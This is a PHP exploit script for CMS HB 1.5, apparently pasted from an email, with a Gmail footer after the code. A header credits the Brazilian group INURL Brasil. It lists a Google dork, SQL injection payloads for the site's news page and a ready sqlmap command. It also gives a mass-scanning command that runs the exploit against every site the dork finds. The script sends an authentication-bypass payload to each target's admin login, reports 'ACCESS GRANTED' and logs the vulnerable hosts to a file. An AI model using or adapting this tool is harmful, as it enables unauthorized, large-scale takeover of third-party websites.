Untitled

<?php


/*

  [+] Discoverer Author: M3t4tr0n

  [+] FACEBOOK:    https://www.facebook.com/M3T4TR0N

  [+] EMAIL:       rammstain960@gmail.com

  [*] Thanks M3t4tr0n

  [*] Neither war between hackers, nor peace for the system.

  ------------------------------------------------------------------------------


  # SCRIPT by:     [ I N U R L  -  B R A S I L ] - [ By GoogleINURL ]

  # EXPLOIT NAME:  XPL 0day CMS HB 1.5 / INURL BRASIL

  # AUTOR:         Cleiton Pinheiro / Nick: googleINURL

  # Email:         inurlbr@gmail.com

  # Blog:          http://blog.inurl.com.br

  # Twitter:       https://twitter.com/googleinurl

  # Fanpage:       https://fb.com/InurlBrasil

  # Pastebin       http://pastebin.com/u/Googleinurl

  # GIT:           https://github.com/googleinurl

  # PSS:           http://packetstormsecurity.com/user/googleinurl

  # EA:            http://exploit4arab.net/author/248/Cleiton_Pinheiro

  # YOUTUBE:       http://youtube.com/c/INURLBrasil

  # PLUS:          http://google.com/+INURLBrasil

  ------------------------------------------------------------------------------


  # FAILURE REPORTED: 15/maio/2015


  # ADMINISTRATIVE ACCESS PANEL


  # Vendor:        http://www.hbwebecia.com.br/

  # CMS HB 1.5


  # Google Dork:   inurl:base.php?pagina


  # FILE VULN      /admin/logar.phpxx

  # POC:          (POST)http://{YOU_URL}/admin/logar.php?login='=' 'or'&senha='=' 'or'&Submit3=Entrar


  # FILE VULN      /base.php

  # POC:          (GET)http://{YOU_URL}/base.php?pagina=noticia&id=1 + (SQLI)


  # Type: boolean-based blind

  Title: AND boolean-based blind - WHERE or HAVING clause

  Payload: pagina=noticia&id=114' AND 1866=1866 AND 'qvCe'='qvCe


  # Type: AND/OR time-based blind

  Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

  Payload: pagina=noticia&id=114' AND (SELECT * FROM (SELECT(SLEEP(5)))MPQc) AND 'MJVC'='MJVC


  # Type: UNION query

  Title: Generic UNION query (NULL) - 7 columns

  Payload: pagina=noticia&id=114' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x664a78565a7276576e76,0x71787a7871),NULL,NULL--


   # USE SQLMAP:

  ./sqlmap.py -u 'http://{YOU_URL}/base.php?pagina=noticia&id=1'  //

  --dbs --random-agent --level 3 --risk 2  --proxy 'http://localhost:8118' //

  --dbms='MySQL' --threads 3 --time-sec 10 --identify-waf --text-only //

  --flush-session --batch


  # EXECUTE:       php xpl.php -t http://target.us


  # FILE_OUTPUT :  HB.txt


  # EXPLOIT MASS USE SCANNER INURLBR

  php inurlbr.php --dork 'inurl:base.php?pagina" ext:php' -s output.txt  --command-all 'php xpl.php -t _TARGET_'

  More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR

  ------------------------------------------------------------------------------


 */

error_reporting(1);

set_time_limit(0);

ini_set('display_errors', 1);

ini_set('max_execution_time', 0);

ini_set('allow_url_fopen', 1);

ob_implicit_flush(true);

ob_end_flush();


$op_ = getopt('f:t:', array('help::'));

echo "[+] [Exploit]: XPL 0day CMS HB 1.5 / INURL BRASIL \n";

$menu = "

    -t : SET TARGET.

    Execute:

                  php xpl.php -t target

                  php xpl.php -t target/path

\n";

echo isset($op_['help']) ? exit($menu) : NULL;

$params = array(

    'host' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}") : exit("\n[x] [ERRO] DEFINE TARGET!\n"),

    'line' => "-----------------------------------------------------------------------------------------------"

);


function __plus() {

    ob_flush();

    flush();

}


function not_isnull_empty($valor = NULL) {

    RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;

}


function __request($params) {

    $objcurl = curl_init();

    curl_setopt($objcurl, CURLOPT_URL, "{$params['host']}/admin/logar.php");

    curl_setopt($objcurl, CURLOPT_USERAGENT, "Mozilla/" . rand(1, 50) . ".0 (compatible; MSIE " . rand(1, 50) . "." . rand(1, 50) . "1; Windows NT " . rand(1, 50) . ".0)");

    curl_setopt($objcurl, CURLOPT_POST, 1);

    curl_setopt($objcurl, CURLOPT_TIMEOUT, 5);

    curl_setopt($objcurl, CURLOPT_POSTFIELDS, array('login' => "'=' 'or'", 'senha' => "'=' 'or'", 'Submit3' => 'Entrar'));

    curl_setopt($objcurl, CURLOPT_SSL_VERIFYPEER, 0);

    curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0);

    curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);

    curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 5);

    curl_setopt($objcurl, CURLOPT_FRESH_CONNECT, 1);


    $info[0] = curl_exec($objcurl);

    $info[1] = curl_getinfo($objcurl);

    $info[2] = curl_error($objcurl);


    curl_close($objcurl) . __plus();

    unset($objcurl);


    return $info;

}


print "\n" . date("h:m:s") . " [+][XPL SEND POST]: array('login' => \"'=' 'or'\", 'senha' => \"'=' 'or'\", 'Submit3' => 'Entrar')";


$_h = __request($params);


if (strstr($_h[1]['redirect_url'], '/admin/index.php')) {


    print "\n" . date("h:m:s") . " [+][RETURN]:: ACCESS GRANTED!";

    print "\n" . date("h:m:s") . " [+][URL]:: {$params['host']}/admin/index.php [ OK ]";

    print "\n" . date("h:m:s") . " [+][LOGIN]:: '=' 'or'";

    print "\n" . date("h:m:s") . " [+][SENHA]:: '=' 'or' \n{$params['line']}\n";

    file_put_contents("HB.txt", "{$params['host']} -  LOGIN: '=' 'or' / SENHA: '=' 'or'\n\n", FILE_APPEND);

    __plus();

} else {


    print "\n" . date("h:m:s") . " [x][NOT VULN] " . (isset($_h[2]) && !empty($_h[2]) ? " - [DETAILS]::{$_h[2]}" : NULL) . "\n{$params['line']}\n\n";

}


Click here to Reply, Reply to all or Forward

0.03 GB (0%) of 15 GB used

Manage

Terms - Privacy

Last account activity: 3 days ago

Details


People (3)

INURL Brasil's profile photo

	INURL Brasil